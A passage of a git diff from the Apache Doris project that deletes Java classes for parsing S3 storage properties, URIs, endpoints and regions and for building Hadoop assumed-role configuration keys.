maxConnections = "50"; - - @Getter - @ConnectorProperty(names = {"s3.connection.request.timeout", - "AWS_REQUEST_TIMEOUT_MS"}, - required = false, - description = "The request timeout of S3 in milliseconds,") - protected String requestTimeoutS = "3000"; - - @Getter - @ConnectorProperty(names = {"s3.connection.timeout", - "AWS_CONNECTION_TIMEOUT_MS"}, - required = false, - description = "The connection timeout of S3 in milliseconds,") - protected String connectionTimeoutS = "1000"; - - @Setter - @Getter - @ConnectorProperty(names = {USE_PATH_STYLE, "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - - @ConnectorProperty(names = {"force_parsing_by_standard_uri"}, required = false, - description = "Whether to use path style URL for the storage.") - @Setter - @Getter - protected String forceParsingByStandardUrl = "false"; - - @ConnectorProperty(names = {"s3.sts_endpoint"}, - supported = false, - required = false, - description = "The sts endpoint of S3.") - protected String s3StsEndpoint = ""; - - @ConnectorProperty(names = {"s3.sts_region"}, - supported = false, - required = false, - description = "The sts region of S3.") - protected String s3StsRegion = ""; - - @Getter - @ConnectorProperty(names = {ROLE_ARN, "AWS_ROLE_ARN", "glue.role_arn"}, - required = false, - description = "The iam role of S3.") - protected String s3IAMRole = ""; - - @Getter - @ConnectorProperty(names = {EXTERNAL_ID, "AWS_EXTERNAL_ID", "glue.external_id"}, - required = false, - description = "The external id of S3.") - protected String s3ExternalId = ""; - - @ConnectorProperty(names = {CREDENTIALS_PROVIDER_TYPE, "glue.credentials_provider_type", - "iceberg.rest.credentials_provider_type"}, - required = false, - description = "The credentials provider type of S3. " - + "Options are: DEFAULT, ASSUME_ROLE, ENVIRONMENT, SYSTEM_PROPERTIES, " - + "WEB_IDENTITY_TOKEN_FILE, INSTANCE_PROFILE. " - + "If not set, it will use the default provider chain of AWS SDK.") - protected String awsCredentialsProviderType = AwsCredentialsProviderMode.DEFAULT.name(); - - @Getter - private AwsCredentialsProviderMode awsCredentialsProviderMode; - - public static S3Properties of(Map properties) { - S3Properties propertiesObj = new S3Properties(properties); - ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); - propertiesObj.initNormalizeAndCheckProps(); - return propertiesObj; - } - - /** - * Pattern to match various AWS S3 endpoint formats and extract the region part. - *

      - * Supported formats: - * - s3.us-west-2.amazonaws.com => region = us-west-2 - * - s3.dualstack.us-east-1.amazonaws.com => region = us-east-1 - * - s3-fips.us-east-2.amazonaws.com => region = us-east-2 - * - s3-fips.dualstack.us-east-2.amazonaws.com => region = us-east-2 - * - s3express-control.us-west-2.amazonaws.com => region = us-west-2 (S3 Directory Bucket Regional) - * - s3express-usw2-az1.us-west-2.amazonaws.com => region = us-west-2 (S3 Directory Bucket Zonal) - *

      - * Group(1), Group(2), or Group(3) in the pattern captures the region part if available. - *

      - * For Glue https://docs.aws.amazon.com/general/latest/gr/glue.html - */ - private static final Set ENDPOINT_PATTERN = ImmutableSet.of( - Pattern.compile( - "^(?:https?://)?(?:" - + "s3(?:[-.]fips)?(?:[-.]dualstack)?[-.]([a-z0-9-]+)|" // Standard S3 endpoints - + "s3express-control\\.([a-z0-9-]+)|" // Directory bucket regional - + "s3express-[a-z0-9-]+\\.([a-z0-9-]+)" // Directory bucket zonal - + ")\\.amazonaws\\.com(?:/.*)?$", - Pattern.CASE_INSENSITIVE), - Pattern.compile( - "^(?:https?://)?glue(?:-fips)?\\.([a-z0-9-]+)\\.(amazonaws\\.com(?:\\.cn)?|api\\.aws)$", - Pattern.CASE_INSENSITIVE)); - - public S3Properties(Map origProps) { - super(Type.S3, origProps); - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - if (StringUtils.isNotBlank(s3ExternalId) && StringUtils.isBlank(s3IAMRole)) { - throw new IllegalArgumentException("s3.external_id must be used with s3.role_arn"); - } - convertGlueToS3EndpointIfNeeded(); - awsCredentialsProviderMode = AwsCredentialsProviderMode.fromString(awsCredentialsProviderType); - } - - /** - * Guess if the storage properties is for this storage type. - * Subclass should override this method to provide the correct implementation. - * - * @return - */ - protected static boolean guessIsMe(Map origProps) { - String endpoint = Stream.of(ENDPOINT_NAMES_FOR_GUESSING) - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - /** - * Check if the endpoint contains "amazonaws.com" to determine if it's an S3-compatible storage. - * Note: This check should not be overly strict, as a malformed or misconfigured endpoint may - * cause the type detection to fail, leading to missed recognition of valid S3 properties. - * A more robust approach would allow further validation downstream rather than failing early here. - */ - if (StringUtils.isNotBlank(endpoint)) { - return endpoint.contains("amazonaws.com"); - } - - // guess from URI - Optional uriValue = origProps.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase("uri")) - .map(Map.Entry::getValue) - .findFirst(); - if (uriValue.isPresent()) { - return uriValue.get().contains("amazonaws.com"); - } - - // guess from region - String region = Stream.of(REGION_NAMES_FOR_GUESSING) - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - if (StringUtils.isNotBlank(region)) { - return true; - } - return false; - } - - @Override - protected Set endpointPatterns() { - return ENDPOINT_PATTERN; - } - - @Override - protected Set schemas() { - return ImmutableSet.of("s3", "s3a", "s3n"); - } - - @Override - public Map getBackendConfigProperties() { - Map backendProperties = generateBackendS3Configuration(); - - if (StringUtils.isNotBlank(s3IAMRole)) { - backendProperties.put("AWS_ROLE_ARN", s3IAMRole); - } - if (StringUtils.isNotBlank(s3ExternalId)) { - backendProperties.put("AWS_EXTERNAL_ID", s3ExternalId); - } - return backendProperties; - } - - @Override - protected String getAwsCredentialsProviderTypeForBackend() { - return awsCredentialsProviderMode == null ? null : awsCredentialsProviderMode.getMode(); - } - - private void convertGlueToS3EndpointIfNeeded() { - if (this.endpoint.contains("glue")) { - this.endpoint = "https://s3." + this.region + ".amazonaws.com"; - } - } - - /** - * Builds the {@code fs.s3a.*} Hadoop config keys for assumed-role (IAM role) access when no static access key is - * configured. - * - *

      NOTE (fe-property simplification): the legacy fe-core class branched on the FE-global - * {@code Config.aws_credentials_provider_version} ("v1"/"v2") and consulted {@code AwsCredentialsProviderFactory}. - * fe-property is a connector-facing parsing module with no fe-core {@code Config} and no AWS SDK dependency, so it - * emits the default (v1) assumed-role provider wiring only, referencing provider classes by their fully-qualified - * name string. Consumers needing the v2 wiring set the credential-provider keys themselves. - */ - @Override - public void initializeHadoopStorageConfig() { - super.initializeHadoopStorageConfig(); - if (StringUtils.isNotBlank(accessKey)) { - return; - } - // Set assumed_roles - // @See https://hadoop.apache.org/docs/r3.4.1/hadoop-aws/tools/hadoop-aws/assumed_roles.html - if (StringUtils.isNotBlank(s3IAMRole)) { - // @See org.apache.hadoop.fs.s3a.auth.AssumedRoleCredentialProvider - hadoopConfigMap.put("fs.s3a.assumed.role.arn", s3IAMRole); - hadoopConfigMap.put("fs.s3a.aws.credentials.provider", - "org.apache.hadoop.fs.s3a.auth.AssumedRoleCredentialProvider"); - hadoopConfigMap.put("fs.s3a.assumed.role.credentials.provider", - "software.amazon.awssdk.auth.credentials.InstanceProfileCredentialsProvider"); - if (StringUtils.isNotBlank(s3ExternalId)) { - hadoopConfigMap.put("fs.s3a.assumed.role.external.id", s3ExternalId); - } - } - } - - @Override - protected String getEndpointFromRegion() { - if (!StringUtils.isBlank(endpoint)) { - return endpoint; - } - if (StringUtils.isBlank(region)) { - return ""; - } - return "https://s3." + region + ".amazonaws.com"; - } - - private static final Pattern IPV4_PORT_PATTERN = Pattern.compile("((?:\\d{1,3}\\.){3}\\d{1,3}:\\d{1,5})"); - - public static String getRegionOfEndpoint(String endpoint) { - if (IPV4_PORT_PATTERN.matcher(endpoint).find()) { - // if endpoint contains '192.168.0.1:8999', return null region - return null; - } - String[] endpointSplit = endpoint.replace("http://", "") - .replace("https://", "") - .split("\\."); - if (endpointSplit.length < 2) { - return null; - } - if (endpointSplit[0].contains("oss-")) { - // compatible with the endpoint: oss-cn-bejing.aliyuncs.com - return endpointSplit[0]; - } - return endpointSplit[1]; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java deleted file mode 100644 index cb2a8c46395d8d..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java +++ /dev/null @@ -1,228 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.StoragePropertiesException; - -import org.apache.commons.lang3.StringUtils; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.net.URI; -import java.net.URISyntaxException; -import java.util.Map; -import java.util.Optional; - -public class S3PropertyUtils { - private static final Logger LOG = LogManager.getLogger(S3PropertyUtils.class); - - private static final String SCHEME_DELIM = "://"; - private static final String S3_SCHEME_PREFIX = "s3://"; - - // S3-compatible schemes that can be converted to s3:// with simple string replacement - // Format: scheme://bucket/key -> s3://bucket/key - private static final String[] SIMPLE_S3_COMPATIBLE_SCHEMES = { - "s3a", "s3n", "oss", "cos", "cosn", "obs", "bos", "gs" - }; - - /** - * Constructs the S3 endpoint from a given URI in the props map. - * - * @param props the map containing the S3 URI, keyed by URI_KEY - * @param stringUsePathStyle whether to use path-style access ("true"/"false") - * @param stringForceParsingByStandardUri whether to force parsing using the standard URI format ("true"/"false") - * @return the extracted S3 endpoint or null if URI is invalid or parsing fails - *

      - * Example: - * Input URI: "https://s3.us-west-1.amazonaws.com/my-bucket/my-key" - * Output: "s3.us-west-1.amazonaws.com" - */ - public static String constructEndpointFromUrl(Map props, - String stringUsePathStyle, - String stringForceParsingByStandardUri) { - Optional uriOptional = props.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase(StorageProperties.URI_KEY)) - .map(Map.Entry::getValue) - .findFirst(); - - if (!uriOptional.isPresent()) { - return null; - } - String uri = uriOptional.get(); - if (StringUtils.isBlank(uri)) { - return null; - } - boolean usePathStyle = Boolean.parseBoolean(stringUsePathStyle); - boolean forceParsingByStandardUri = Boolean.parseBoolean(stringForceParsingByStandardUri); - S3URI s3uri; - try { - s3uri = S3URI.create(uri, usePathStyle, forceParsingByStandardUri); - } catch (StoragePropertiesException e) { - throw new IllegalArgumentException("Invalid S3 URI: " + uri + ",usePathStyle: " + usePathStyle - + " forceParsingByStandardUri: " + forceParsingByStandardUri, e); - } - return s3uri.getEndpoint().orElse(null); - } - - /** - * Extracts the S3 region from a URI in the given props map. - * - * @param props the map containing the S3 URI, keyed by URI_KEY - * @param stringUsePathStyle whether to use path-style access ("true"/"false") - * @param stringForceParsingByStandardUri whether to force parsing using the standard URI format ("true"/"false") - * @return the extracted S3 region or null if URI is invalid or parsing fails - *

      - * Example: - * Input URI: "https://s3.us-west-1.amazonaws.com/my-bucket/my-key" - * Output: "us-west-1" - */ - public static String constructRegionFromUrl(Map props, - String stringUsePathStyle, - String stringForceParsingByStandardUri) { - Optional uriOptional = props.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase(StorageProperties.URI_KEY)) - .map(Map.Entry::getValue) - .findFirst(); - - if (!uriOptional.isPresent()) { - return null; - } - String uri = uriOptional.get(); - if (StringUtils.isBlank(uri)) { - return null; - } - boolean usePathStyle = Boolean.parseBoolean(stringUsePathStyle); - boolean forceParsingByStandardUri = Boolean.parseBoolean(stringForceParsingByStandardUri); - S3URI s3uri = null; - try { - s3uri = S3URI.create(uri, usePathStyle, forceParsingByStandardUri); - } catch (StoragePropertiesException e) { - throw new IllegalArgumentException("Invalid S3 URI: " + uri + ",usePathStyle: " + usePathStyle - + " forceParsingByStandardUri: " + forceParsingByStandardUri, e); - } - return s3uri.getRegion().orElse(null); - } - - /** - * Validates and normalizes the given path into a standard S3 URI. - * If the input already starts with a known S3-compatible scheme (s3://, s3a://, oss://, etc.), - * it is returned as-is to avoid expensive regex parsing. - * Otherwise, it is parsed and converted into an S3-compatible URI format. - * - * @param path the raw S3-style path or full URI - * @param stringUsePathStyle whether to use path-style access ("true"/"false") - * @param stringForceParsingByStandardUri whether to force parsing using the standard URI format ("true"/"false") - * @return normalized S3 URI string like "s3://bucket/key" - * @throws StoragePropertiesException if the input path is blank or invalid - *

      - * Example: - * Input: "https://s3.us-west-1.amazonaws.com/my-bucket/my-key" - * Output: "s3://my-bucket/my-key" - */ - public static String validateAndNormalizeUri(String path, - String stringUsePathStyle, - String stringForceParsingByStandardUri) - throws StoragePropertiesException { - if (StringUtils.isBlank(path)) { - throw new StoragePropertiesException("path is null"); - } - - // Fast path 1: s3:// paths are already in the normalized format expected by BE - if (path.startsWith(S3_SCHEME_PREFIX)) { - return path; - } - - // Fast path 2: simple S3-compatible schemes (oss://, cos://, s3a://, etc.) - // can be converted with simple string replacement: scheme://bucket/key -> s3://bucket/key - String normalized = trySimpleSchemeConversion(path); - if (normalized != null) { - return normalized; - } - - // Full parsing path: for HTTP URLs and other complex formats - boolean usePathStyle = Boolean.parseBoolean(stringUsePathStyle); - boolean forceParsingByStandardUri = Boolean.parseBoolean(stringForceParsingByStandardUri); - S3URI s3uri = S3URI.create(path, usePathStyle, forceParsingByStandardUri); - return "s3" + S3URI.SCHEME_DELIM + s3uri.getBucket() + S3URI.PATH_DELIM + s3uri.getKey(); - } - - /** - * Try to convert simple S3-compatible scheme URIs to s3:// format using string replacement. - * This avoids expensive regex parsing for common cases like oss://bucket/key, s3a://bucket/key, etc. - * - * @param path the input path - * @return converted s3:// path if successful, null if the path doesn't match simple pattern - */ - private static String trySimpleSchemeConversion(String path) { - int delimIndex = path.indexOf(SCHEME_DELIM); - if (delimIndex <= 0) { - return null; - } - - String scheme = path.substring(0, delimIndex).toLowerCase(); - for (String compatibleScheme : SIMPLE_S3_COMPATIBLE_SCHEMES) { - if (compatibleScheme.equals(scheme)) { - String rest = path.substring(delimIndex + SCHEME_DELIM.length()); - if (rest.isEmpty() || rest.startsWith(S3URI.PATH_DELIM) || rest.contains(SCHEME_DELIM)) { - return null; - } - // Simple conversion: replace scheme with "s3" - // e.g., "oss://bucket/key" -> "s3://bucket/key" - return S3_SCHEME_PREFIX + rest; - } - } - return null; - } - - /** - * Extracts and returns the raw URI string from the given props map. - * - * @param props the map expected to contain a 'uri' entry - * @return the URI string from props - * @throws StoragePropertiesException if the map is empty or does not contain 'uri' - *

      - * Example: - * Input: {"uri": "s3://my-bucket/my-key"} - * Output: "s3://my-bucket/my-key" - */ - public static String validateAndGetUri(Map props) { - if (props.isEmpty()) { - throw new StoragePropertiesException("props is empty"); - } - Optional uriOptional = props.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase(StorageProperties.URI_KEY)) - .map(Map.Entry::getValue) - .findFirst(); - - if (!uriOptional.isPresent()) { - throw new StoragePropertiesException("props must contain uri"); - } - return uriOptional.get(); - } - - public static String convertPathToS3(String path) { - try { - URI orig = new URI(path); - URI s3url = new URI("s3", orig.getRawAuthority(), - orig.getRawPath(), orig.getRawQuery(), orig.getRawFragment()); - return s3url.toString(); - } catch (URISyntaxException e) { - return path; - } - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java deleted file mode 100644 index 68cffaed374f98..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java +++ /dev/null @@ -1,404 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.base.Strings; -import com.google.common.collect.ImmutableSet; -import org.apache.commons.lang3.StringUtils; - -import java.net.URI; -import java.net.URISyntaxException; -import java.util.ArrayList; -import java.util.List; -import java.util.Map; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Matcher; -import java.util.regex.Pattern; -import java.util.stream.Collectors; - -/** - * This class represents a fully qualified location in S3 for input/output - * operations expressed as as URI. - *

      - * For AWS S3, uri common styles should be: - * 1. AWS Client Style(Hadoop S3 Style): s3://my-bucket/path/to/file?versionId=abc123&partNumber=77&partNumber=88 - * or - * 2. Virtual Host Style: https://my-bucket.s3.us-west-1.amazonaws.com/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 - * or - * 3. Path Style: https://s3.us-west-1.amazonaws.com/my-bucket/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 - * - * Regarding the above-mentioned common styles, we can use isPathStyle to control whether to use path style - * or virtual host style. - * "Virtual host style" is the currently mainstream and recommended approach to use, so the default value of - * isPathStyle is false. - * - * Other Styles: - * 1. Virtual Host AWS Client (Hadoop S3) Mixed Style: - * s3://my-bucket.s3.us-west-1.amazonaws.com/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 - * or - * 2. Path AWS Client (Hadoop S3) Mixed Style: - * s3://s3.us-west-1.amazonaws.com/my-bucket/resources/doc.txt?versionId=abc123&partNumber=77&partNumber=88 - * - * For these two styles, we can use isPathStyle and forceParsingByStandardUri - * to control whether to use. - * Virtual Host AWS Client (Hadoop S3) Mixed Style: isPathStyle = false && forceParsingByStandardUri = true - * Path AWS Client (Hadoop S3) Mixed Style: isPathStyle = true && forceParsingByStandardUri = true - * - */ - -public class S3URI { - - private static final Pattern URI_PATTERN = - Pattern.compile("^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))?"); - public static final String SCHEME_DELIM = "://"; - public static final String PATH_DELIM = "/"; - private static final Set VALID_SCHEMES = ImmutableSet.of("http", "https", "s3", "s3a", "s3n", - "bos", "oss", "cos", "cosn", "obs", "gs", "azure"); - - private static final Set OS_SCHEMES = ImmutableSet.of("s3", "s3a", "s3n", - "bos", "oss", "cos", "cosn", "gs", "obs", "azure"); - - /** Suffix of S3Express storage bucket names. */ - private static final String S3_DIRECTORY_BUCKET_SUFFIX = "--x-s3"; - - private URI uri; - - private String bucket; - private String key; - - private String endpoint; - - private String region; - - private boolean isStandardURL; - private boolean isPathStyle; - private Map> queryParams; - - /** - * Creates a new S3URI based on the bucket and key parsed from the location as defined in: - * https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingBucket.html#access-bucket-intro - *

      - * Supported access styles are Virtual Hosted addresses and s3://... URIs with additional - * 's3n' and 's3a' schemes supported for backwards compatibility. - * - * @param location fully qualified URI - */ - public static S3URI create(String location) throws StoragePropertiesException { - return create(location, false, false); - } - - public static S3URI create(String location, boolean isPathStyle) throws StoragePropertiesException { - return new S3URI(location, isPathStyle, false); - } - - public static S3URI create(String location, boolean isPathStyle, boolean forceParsingByStandardUri) - throws StoragePropertiesException { - return new S3URI(location, isPathStyle, forceParsingByStandardUri); - } - - private S3URI(String location, boolean isPathStyle, boolean forceParsingByStandardUri) - throws StoragePropertiesException { - if (Strings.isNullOrEmpty(location)) { - throw new StoragePropertiesException("s3 location can not be null"); - } - this.isPathStyle = isPathStyle; - parseUri(location, forceParsingByStandardUri); - } - - private void parseUri(String location, boolean forceParsingStandardUri) throws StoragePropertiesException { - parseURILocation(location); - validateUri(); - - if (!forceParsingStandardUri && OS_SCHEMES.contains(uri.getScheme().toLowerCase())) { - parseAwsCliStyleUri(); - } else { - parseStandardUri(); - } - parseEndpointAndRegion(); - } - - /** - * parse uri location and encode to a URI. - * @param location - * @throws StoragePropertiesException - */ - private void parseURILocation(String location) throws StoragePropertiesException { - Matcher matcher = URI_PATTERN.matcher(location); - if (!matcher.matches()) { - throw new StoragePropertiesException("Failed to parse uri: " + location); - } - String scheme = matcher.group(2); - String authority = matcher.group(4); - String path = matcher.group(5); - String query = matcher.group(7); - String fragment = matcher.group(9); - try { - uri = new URI(scheme, authority, path, query, fragment).normalize(); - } catch (URISyntaxException e) { - throw new StoragePropertiesException(e.getMessage(), e); - } - } - - private void validateUri() throws StoragePropertiesException { - if (uri.getScheme() == null || !VALID_SCHEMES.contains(uri.getScheme().toLowerCase())) { - throw new StoragePropertiesException("Invalid scheme: " + this.uri); - } - } - - private void parseAwsCliStyleUri() throws StoragePropertiesException { - bucket = uri.getAuthority(); - if (bucket == null) { - throw new StoragePropertiesException("missing bucket: " + uri); - } - String path = uri.getPath(); - if (path.length() > 1) { - key = path.substring(1); - } else { - throw new StoragePropertiesException("missing key: " + uri); - } - - addQueryParamsIfNeeded(); - - isStandardURL = false; - this.isPathStyle = false; - } - - private void parseStandardUri() throws StoragePropertiesException { - if (uri.getHost() == null) { - throw new StoragePropertiesException("Invalid S3 URI: no hostname: " + uri); - } - - addQueryParamsIfNeeded(); - - if (isPathStyle) { - parsePathStyleUri(); - } else { - parseVirtualHostedStyleUri(); - } - isStandardURL = true; - } - - private void addQueryParamsIfNeeded() { - if (uri.getQuery() != null) { - queryParams = splitQueryString(uri.getQuery()).stream().map((s) -> s.split("=")) - .map((s) -> s.length == 1 ? new String[] {s[0], null} : s).collect( - Collectors.groupingBy((a) -> a[0], - Collectors.mapping((a) -> a[1], Collectors.toList()))); - } - } - - private static List splitQueryString(String queryString) { - List results = new ArrayList<>(); - StringBuilder result = new StringBuilder(); - - for (int i = 0; i < queryString.length(); ++i) { - char character = queryString.charAt(i); - if (character != '&') { - result.append(character); - } else { - String param = result.toString(); - results.add(param); - result.setLength(0); - } - } - - String param = result.toString(); - results.add(param); - return results; - } - - private void parsePathStyleUri() throws StoragePropertiesException { - String path = uri.getPath(); - - if (!StringUtils.isEmpty(path) && !"/".equals(path)) { - int index = path.indexOf('/', 1); - - if (index == -1) { - // No trailing slash, e.g., "https://s3.amazonaws.com/bucket" - bucket = path.substring(1); - throw new StoragePropertiesException("missing key: " + uri); - } else { - bucket = path.substring(1, index); - if (index != path.length() - 1) { - key = path.substring(index + 1); - } else { - throw new StoragePropertiesException("missing key: " + uri); - } - } - } else { - throw new StoragePropertiesException("missing bucket: " + this.uri); - } - } - - private void parseVirtualHostedStyleUri() throws StoragePropertiesException { - bucket = uri.getHost().split("\\.")[0]; - - String path = uri.getPath(); - if (!StringUtils.isEmpty(path) && !"/".equals(path)) { - key = path.substring(1); - } else { - throw new StoragePropertiesException("missing key from uri: " + this.uri); - } - } - - private void parseEndpointAndRegion() { - // parse endpoint - if (isStandardURL) { - if (isPathStyle) { - endpoint = uri.getAuthority(); - } else { // virtual_host_style - if (uri.getAuthority() == null) { - endpoint = null; - return; - } - String[] splits = uri.getAuthority().split("\\.", 2); - if (splits.length < 2) { - endpoint = null; - return; - } - endpoint = splits[1]; - } - } else { - endpoint = null; - } - if (endpoint == null) { - return; - } - - // parse region - String[] endpointSplits = endpoint.split("\\."); - if (endpointSplits.length < 2) { - return; - } - if (endpointSplits[0].contains("oss-")) { - // compatible with the endpoint: oss-cn-bejing.aliyuncs.com - region = endpointSplits[0]; - return; - } - region = endpointSplits[1]; - } - - /** - * @return S3 bucket - */ - public String getBucket() { - return bucket; - } - - /** - * @return S3 key - */ - public String getKey() { - return key; - } - - public Optional>> getQueryParams() { - return Optional.ofNullable(queryParams); - } - - public Optional getEndpoint() { - return Optional.ofNullable(endpoint); - } - - public Optional getRegion() { - return Optional.ofNullable(region); - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("S3URI{"); - sb.append("uri=").append(uri); - sb.append(", bucket='").append(bucket).append('\''); - sb.append(", key='").append(key).append('\''); - sb.append(", endpoint='").append(endpoint).append('\''); - sb.append(", region='").append(region).append('\''); - sb.append(", isStandardURL=").append(isStandardURL); - sb.append(", isPathStyle=").append(isPathStyle); - sb.append(", queryParams=").append(queryParams); - sb.append('}'); - return sb.toString(); - } - - /** - * Check if this S3URI uses a directory bucket. - * - * @return true if the bucket is a directory bucket - */ - public boolean useS3DirectoryBucket() { - return isS3DirectoryBucket(this.bucket); - } - - /** - * Check if the bucket name indicates the bucket is a directory bucket. This method does not check - * against the S3 service. - * - *

      Directory bucket names follow the format: bucket-name--azid--x-s3 - * where azid is an availability zone identifier like "usw2-az1", "use1-az4", etc. - * - * @param bucketName bucket to probe. - * @return true if the bucket name indicates the bucket is a directory bucket - */ - public static boolean isS3DirectoryBucket(final String bucketName) { - if (bucketName == null || !bucketName.endsWith(S3_DIRECTORY_BUCKET_SUFFIX)) { - return false; - } - // Check if the bucket name has the correct format: bucket-name--azid--x-s3 - // The bucket name should have at least 3 segments separated by "--" - String[] segments = bucketName.split("--"); - if (segments.length < 3) { - return false; - } - // The last segment should be "x-s3" - if (!"x-s3".equals(segments[segments.length - 1])) { - return false; - } - // The second-to-last segment should be the availability zone identifier - // It should have a format like "usw2-az1", "use1-az4", etc. - String azid = segments[segments.length - 2]; - if (azid == null || azid.isEmpty()) { - return false; - } - // Basic validation: azid should contain at least one hyphen and not be empty - // More sophisticated validation could be added here if needed - return azid.contains("-") && azid.length() > 3; - } - - /** - * Adjusts a glob prefix for S3 Directory Bucket listing. - *

      - * For Directory Buckets, listing with a prefix like "path/to/files" will not return any results - * if the objects are "path/to/files1.csv", "path/to/files2.csv", etc. The prefix needs to be - * adjusted to the containing "directory", which is "path/to/". - * - * @param globPrefix The prefix derived from a glob pattern (e.g., "path/to/files" from "path/to/files*.csv"). - * @return The adjusted prefix ending with a "/" (e.g., "path/to/"), or an empty string if no "/" is present. - */ - public static String getDirectoryPrefixForGlob(final String globPrefix) { - if (globPrefix == null || globPrefix.isEmpty() || globPrefix.endsWith("/")) { - return globPrefix; - } - int lastSlashIndex = globPrefix.lastIndexOf('/'); - if (lastSlashIndex >= 0) { - return globPrefix.substring(0, lastSlashIndex + 1); - } - return ""; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java deleted file mode 100644 index d7fd8cb637489a..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java +++ /dev/null @@ -1,409 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; -import org.apache.doris.property.ConnectionProperties; - -import lombok.Getter; -import org.apache.commons.lang3.BooleanUtils; -import org.apache.commons.lang3.StringUtils; - -import java.lang.reflect.Field; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.HashMap; -import java.util.LinkedHashMap; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.function.BiFunction; - -public abstract class StorageProperties extends ConnectionProperties { - - public static final String FS_HDFS_SUPPORT = "fs.hdfs.support"; - public static final String FS_S3_SUPPORT = "fs.s3.support"; - public static final String FS_GCS_SUPPORT = "fs.gcs.support"; - public static final String FS_MINIO_SUPPORT = "fs.minio.support"; - public static final String FS_OZONE_SUPPORT = "fs.ozone.support"; - public static final String FS_BROKER_SUPPORT = "fs.broker.support"; - public static final String FS_AZURE_SUPPORT = "fs.azure.support"; - public static final String FS_OSS_SUPPORT = "fs.oss.support"; - public static final String FS_OBS_SUPPORT = "fs.obs.support"; - public static final String FS_COS_SUPPORT = "fs.cos.support"; - public static final String FS_OSS_HDFS_SUPPORT = "fs.oss-hdfs.support"; - public static final String FS_LOCAL_SUPPORT = "fs.local.support"; - public static final String FS_HTTP_SUPPORT = "fs.http.support"; - - public static final String DEPRECATED_OSS_HDFS_SUPPORT = "oss.hdfs.enabled"; - protected static final String URI_KEY = "uri"; - - public static final String FS_PROVIDER_KEY = "provider"; - - protected final String userFsPropsPrefix = "fs."; - - public enum Type { - HDFS, - S3, - OSS, - OBS, - COS, - GCS, - OSS_HDFS, - MINIO, - OZONE, - AZURE, - BROKER, - LOCAL, - HTTP, - UNKNOWN - } - - public abstract Map getBackendConfigProperties(); - - /** - * Normalized Hadoop-style storage configuration as a flat key/value map (e.g. {@code fs.s3a.*}, - * {@code fs.cosn.*}, {@code fs.obs.*}, {@code fs.azure.*}, {@code dfs.*}). This module deliberately does NOT - * build a live Hadoop {@code Configuration} object: it only produces the keys to set. Consumers (fe-core, SPI - * connectors) overlay this map onto their own {@code Configuration} (e.g. - * {@code getHadoopConfigMap().forEach(conf::set)}) using their own hadoop dependency. - *

